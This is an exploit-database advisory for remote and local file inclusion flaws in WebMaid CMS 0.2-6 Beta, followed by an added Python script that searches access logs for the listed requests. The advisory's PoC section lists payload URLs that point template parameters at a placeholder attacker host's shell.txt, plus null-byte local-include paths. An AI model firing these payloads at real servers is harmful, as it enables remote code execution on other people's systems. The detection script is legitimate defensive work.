Vendor: WebMaid CMS
By: cr4wl3r
CVSS: 7.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: WebMaid CMS
Affected Version From: 0.2-6 Beta
Affected Version To: 0.2-6 Beta
Patch Exists: YES
Related CWE: N/A
CPE: a:webmaidcms:webmaid_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability

WebMaid CMS version 0.2-6 Beta is vulnerable to multiple Remote File Include vulnerabilities. An attacker can exploit them by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server, depending on the privileges associated with the application. The vulnerable parameters are 'template', 'menu' and 'events', which can be found in the index.php file.

Mitigation:

Upgrade to the latest version of WebMaid CMS.

Exploit-DB raw data:

====================================================================
WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability
====================================================================


[+] WebMaid CMS <= 0.2-6 Beta Multiple Remote File Include Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/11394
[+] Download: http://code.google.com/p/webmaidcms/downloads/list

[+] PoC RFI:
    [path]/template/babyweb/index.php?template=[attacker.com]/shell.txt???
    [path]/template/babyweb/index.php?menu=[attacker]/shell.txt???
    [path]/template/babyweb/index.php?events=[attacker]/shell.txt???
    [path]/template/babyweb/index.php?SITEROOT=[attacker]/shell.txt???
    [path]/template/calm/footer.php?modules=[attacker]/shell.txt???
    [path]/template/calm/footer.php?copyright=[attacker]/shell.txt???
    [path]/template/calm/top.php?menu=[attacker]/shell.txt???
    [path]/template/wm025/footer.php?modules=[attacker]/shell.txt???
    [path]/template/wm025/footer.php?copyright=[attacker]/shell.txt???
    [path]/template/wm025/footer.php?menu=[attacker]/shell.txt???

[+] PoC LFI:
    [path]/cContactus.php?com=[LFI%00]
    [path]/cGuestbook.php?com=[LFI%00]
    [path]/cArticle.php?com=[LFI%00]

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]
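
For defenders triaging web access logs for the request patterns listed in this advisory, the following check is an added example and not part of the original advisory or the WebMaid CMS code. The script paths and parameter names come from the PoC lists above; the log format, the sample lines and the rules for what counts as a remote or local include value are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script/parameter pairs taken from the advisory's PoC lists.
RFI_PARAMS = {
    "/template/babyweb/index.php": {"template", "menu", "events", "SITEROOT"},
    "/template/calm/footer.php": {"modules", "copyright"},
    "/template/calm/top.php": {"menu"},
    "/template/wm025/footer.php": {"modules", "copyright", "menu"},
}
LFI_SCRIPTS = ("/cContactus.php", "/cGuestbook.php", "/cArticle.php")

# Assumption: a remote include value carries a URL scheme or is protocol-relative.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# Assumption: a null byte, traversal sequence or absolute path marks local-include abuse.
LOCAL = re.compile(r"\x00|\.\.[/\\]|^[/\\]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(log_line):
    """Return (kind, script, parameter) findings for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    # parse_qsl percent-decodes values, so %00 becomes a literal NUL byte.
    params = parse_qsl(url.query, keep_blank_values=True)
    findings = []
    for script, names in RFI_PARAMS.items():
        if url.path.endswith(script):
            findings += [("RFI", script, k) for k, v in params
                         if k in names and REMOTE.search(v)]
    for script in LFI_SCRIPTS:
        if url.path.endswith(script):
            findings += [("LFI", script, k) for k, v in params
                         if k == "com" and LOCAL.search(v)]
    return findings

SAMPLE = [  # constructed log lines using documentation addresses and hosts
    '203.0.113.5 - - [22/Mar/2010:10:00:01 +0000] "GET /cms/template/babyweb/index.php?template=http://files.example.net/x.txt??? HTTP/1.1" 200 512',
    '203.0.113.5 - - [22/Mar/2010:10:00:02 +0000] "GET /cms/template/calm/top.php?menu=main HTTP/1.1" 200 2048',
    '203.0.113.9 - - [22/Mar/2010:10:00:03 +0000] "GET /cms/cArticle.php?com=../../some/file%00 HTTP/1.1" 200 1024',
    '203.0.113.9 - - [22/Mar/2010:10:00:04 +0000] "GET /cms/cGuestbook.php?com=guestbook HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(classify(line) or "clean", "<-", line.split('"')[1])
```

Access logs record only the query string, so the same parameters sent in a request body are not visible to this check.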